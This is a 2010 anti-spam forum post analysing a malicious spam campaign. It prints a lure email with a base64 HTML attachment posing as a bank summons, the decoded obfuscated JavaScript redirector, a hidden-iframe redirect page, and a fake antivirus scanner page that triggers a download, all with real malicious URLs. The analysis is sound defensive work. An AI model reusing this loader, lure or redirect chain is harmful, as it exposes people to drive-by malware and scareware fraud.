Author Topic: drive by in spam e-mails massive campaign in effect  (Read 1334 times)

0 Members and 1 Guest are viewing this topic.

September 17, 2010, 11:58:53 am
Read 1334 times

cleanmx

  • Special Members
  • Hero Member

  • Offline
  • *

  • 3405
    • Spam-Filter Anti-Spam Virenschutz - CLEAN MX Managed Anti-Spam Service ist die Lösung für Ihr Spam-Problem
hi

we encounter many mails like this one:

Code: [Select]
Return-Path: <uncoordinatedj@redhyundai.com>
X-Original-To: abuse@clean-mx.de
Delivered-To: abuse@clean-mx.de
Received: from relayn.netpilot.net (relayn19.netpilot.net [195.214.79.19])
(using TLSv1 with cipher ADH-AES256-SHA (256/256 bits))
(No client certificate requested)
by ksrv8.netpilot.net (Postfix) with ESMTPS id 4722C252C003
for <abuse@clean-mx.de>; Fri, 17 Sep 2010 13:47:01 +0200 (CEST)
Received: from relayn.netpilot.net (localhost [127.0.0.1])
by relayn.netpilot.net (Postfix) with ESMTP id BE00E1EB000C
for <abuse@clean-mx.de>; Fri, 17 Sep 2010 13:47:00 +0200 (CEST)
Received: from localhost (unknown [127.0.0.1])
by localhost (Postfix) with ESMTP id 7987F1EB0006
for <abuse@clean-mx.de>; Fri, 17 Sep 2010 11:47:00 +0000 (UTC)
Received: from relayn.netpilot.net ([127.0.0.1])
by localhost (relayn.netpilot.net [127.0.0.1]) (clean-mx, port 10024)
with ESMTP id JpRKoc8QfoXo for <abuse@clean-mx.de>;
Fri, 17 Sep 2010 13:46:59 +0200 (CEST)
Received: from static-80-66-147-62.ivnet.ru (unknown [80.66.147.62])
by relayn.netpilot.net (Postfix) with ESMTP id 806B139C007
for <abuse@clean-mx.de>; Fri, 17 Sep 2010 13:46:59 +0200 (CEST)
Received: from svtmail03.prod.sabre.com (svtmail08.prod.sabre.com [151.193.64.1])
by mx2.datagrama.net with esmtp
id 98641F-0005B8-60
for abuse@clean-mx.de; Fri, 17 Sep 2010 15:46:57 +0300
Received: from vista (10.208.68.5:38755) by svtmail08.prod.sabre.com (LSMTP for Windows NT v1.1b) with SMTP id <1.0E39B7DF@svtmail05.prod.sabre.com>; Fri, 17 Sep 2010 15:46:57 +0300
Date: Fri, 17 Sep 2010 15:46:57 +0300
From: "Elinor Sutton" <uncoordinatedj@redhyundai.com>
To: abuse@clean-mx.de
Message-ID: <23729982.80821328838943023820.JavaMail.ita@vista>
Subject: Vuong
MIME-Version: 1.0
Content-Type: multipart/mixed;
  boundary="----=_Part_5825058_98131169.1937062675058"

------=_Part_5825058_98131169.1937062675058
Content-Type: text/plain; charset=Windows-1252
Content-Transfer-Encoding: 7bit

 
Today I was served a summons from Wachovia/Wells Fargo with regards to the 20th avenue foreclosure. Attached is a copy of the summons in its entirety and the first page of the borrower final closing statement at the time the borrower received $100K from HMW & JK Enterprises.
 
At the time of applying for the loan, I remember the borrower mentioned about paying off my loan in a short period of time because they were also getting financing from somewhere else. I believe when Wachovia's loan was closed (without our knowledge) the title company that handled their financing should have paid us off so Wachovia would be in the first position.
 
In this case, the title company / closing agent for Wachovia made a mistake. I believe that Wachovia is also insured by their closing agent, but at this time I don't know who this agent is.
 
Wachovia is summoning the wrong party.
 

------=_Part_5825058_98131169.1937062675058
Content-Type: text/html; name="05554wachovia summons.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="05554wachovia summons.html"

PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCIgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij5mdW5j
dGlvbiBldGdyKHpqNHIpe3Zhcg0KYm85Nyxidmd5PSIiLGtwbjgsaXl2Mj0iMG9jZGZ1bTtpcC9x
cmx4PW50Li06diBoZT5zXCJhPCIscDNqZSxqNDQ2PWl5djIubGVuZ3RoO2V2YWwodW5lc2NhcGUo
IiU2NnVuJTYzdGklNkZuIHIlNjFpeSUyOGt1JTc5Yyl7JTYydmclNzkrPSU2QnV5YyU3RCIpKTtm
b3IocDNqZT0wO3AzamU8emo0ci5sZW5ndGg7cDNqZSsrKXtibzk3PXpqNHIuY2hhckF0KHAzamUp
O2twbjg9aXl2Mi5pbmRleE9mKGJvOTcpO2lmKGtwbjg+LTEpe2twbjgtPShwM2plKzEpJWo0NDY7
aWYoa3BuODwwKXtrcG44Kz1qNDQ2O31yYWl5KGl5djIuY2hhckF0KGtwbjgpKTt9ZWxzZXtyYWl5
KGJvOTcpO319ZXZhbCh1bmVzY2FwZSgiJTY0b2MlNzVtZSU2RXQudyU3Mml0JTY1KGIlNzZneSkl
M0JidiU2N3k9JTIyJTIyOyIpKTt9ZXRncigiMGlcInZkYTA+cy0wbWUtaDtjPW94PmZ0Oi5oLTAw
bi5zLXY6ZDs9eCBlXCJtb2M+O2E8bXNhdG1zb2w8Lml0dXFjaGlpeC1lPHUwOmFscGF4ciIpOzwv
c2NyaXB0Pjxub3NjcmlwdD5UbyBkaXNwbGF5IHRoaXMgcGFnZSB5b3UgbmVlZCBhIGJyb3dzZXIg
dGhhdCBzdXBwb3J0cyBKYXZhU2NyaXB0Ljwvbm9zY3JpcHQ+

------=_Part_5825058_98131169.1937062675058--



This piece of html base64 decodes to:

Code: [Select]
<script language="JavaScript" type="text/javascript">function etgr(zj4r){var
bo97,bvgy="",kpn8,iyv2="0ocdfum;ip/qrlx=nt.-:v he>s\"a<",p3je,j446=iyv2.length;eval(unescape("%66un%63ti%6Fn r%61iy%28ku%79c){%62vg%79+=%6Buyc%7D"));for(p3je=0;p3je<zj4r.length;p3je++){bo97=zj4r.charAt(p3je);kpn8=iyv2.indexOf(bo97);if(kpn8>-1){kpn8-=(p3je+1)%j446;if(kpn8<0){kpn8+=j446;}raiy(iyv2.charAt(kpn8));}else{raiy(bo97);}}eval(unescape("%64oc%75me%6Et.w%72it%65(b%76gy)%3Bbv%67y=%22%22;"));}etgr("0i\"vda0>s-0me-h;c=ox>ft:.h-00n.s-v:d;=x e\"moc>;a<msatmsol<.ituqchiix-e<u0:alpaxr");</script><noscript>To display this page you need a browser that supports JavaScript.</noscript>

And this one leads to:

Code: [Select]
<meta http-equiv="refresh" content="0;url=http://numerouno-india.com/x.html" />
this in turn:


Code: [Select]
PLEASE WAITING.... 4 SECONDS
<meta http-equiv="refresh" content="4;url=http://scaner-g.cz.cc/scanner10/?afid=24" />
<iframe width="0" height="0" src="http://arestyute.com/sadhbdsa879321jbdas/index.php"></iframe>

and this for example is a fake scanner download attempt:

Code: [Select]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Language" content="en" />
<meta http-equiv="Cache-control" content="Public" />

<title>My Windows Online Scanner</title>
<link rel="icon" href="/assets/5b9c863d//Images/favicon.gif" type="image/gif" />

<style type="text/css" media="screen">
#loading {
height:auto;
left:45%;
padding:2px;
position:absolute;
top:40%;
z-index:20001;
}
#loading a {
color:#225588;
}
#loading .loading-indicator {
-x-system-font:none;
background:white none repeat scroll 0 0;
color:#444444;
font-family:tahoma,arial,helvetica;
font-size:13px;
font-size-adjust:none;
font-stretch:normal;
font-style:normal;
font-variant:normal;
font-weight:bold;
height:auto;
line-height:normal;
margin:0;
padding:10px;
}
#loading-msg {
-x-system-font:none;
font-family:arial,tahoma,sans-serif;
font-size:10px;
font-size-adjust:none;
font-stretch:normal;
font-style:normal;
font-variant:normal;
font-weight:normal;
line-height:normal;
}
</style>

<script type="text/javascript">
<!--//<![CDATA[
var LinkSoftDown = "/go/?afid=24&time=1284724505";
function ext(){window.open( "/go/?afid=24&time=1284724505", "_blank", "toolbar=0,titlebar=0,scrollbars=0,status=0,location=0,menubar=0,width=100,height=100,left=0,top=0");}
if (window.attachEvent) eval("window.attachEvent('onunload',ext);");
else window.addEventListener("unload", ext, false);
//]]>-->
</script>
</head>
<body>
<div id="loading" style="display:block">
<div class="loading-indicator">
 <img height="50" width="50" style="margin-right: 8px; float: left; vertical-align: top;" src="/assets/5b9c863d//Images/loading.gif"/>
 <br/>
 <span id="loading-msg">Initializing Virus Protection System...</span></div>
</div>

<script type="text/javascript" src="/scanner10/codejs">
</script>
</body>
</html>